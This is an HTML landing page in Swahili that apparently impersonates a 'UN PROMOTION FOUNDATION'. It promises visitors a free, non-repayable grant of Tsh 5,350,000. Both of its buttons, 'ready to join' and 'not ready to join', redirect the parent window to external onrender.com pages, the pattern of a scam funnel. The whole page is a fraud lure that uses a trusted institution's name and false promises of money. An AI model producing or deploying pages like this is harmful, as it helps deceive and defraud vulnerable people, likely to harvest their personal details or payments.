<!DOCTYPE html>
<html>

<head>
    <title>UN PROMOTION FOUNDATION</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }

        h1 {
            font-size: 2em;
            margin-bottom: 20px;
        }

        p {
            font-size: 1.2em;
            line-height: 1.5;
        }

        button {
            background-color: #4CAF50;
            /* Green */
            border: none;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 4px 2px;
            cursor: pointer;
        }

        button:hover {
            background-color: #3e8e41;
            /* Darker green */
        }
    </style>
</head>

<body>
    <h1>Kama UN PROMOTION FOUNDATION inayofadhiliwa na NGOS tunajaribu kuwainua na kuwatangaza watu wetu tukufu kwa
        kuwatuza
        Tsh.5,350,000 huu sio mkopo na haurejeshwi</h1>
    <p>Bonyeza kitufe kinachofaa kuonyesha nia yako.</p>
    <button onclick="redirect()">Tayari kujiunga</button>
    <button onclick="unredirect()">Siko tayari kujiunga</button>
    <script>
    function redirect(){
    window.parent.location.href = "https://page3-tlts.onrender.com/";
    }
    </script>
      <script>
    function unredirect(){
    window.parent.location.href = "https://homepage-l9av.onrender.com/";
    }
    </script>
</body>

</html>
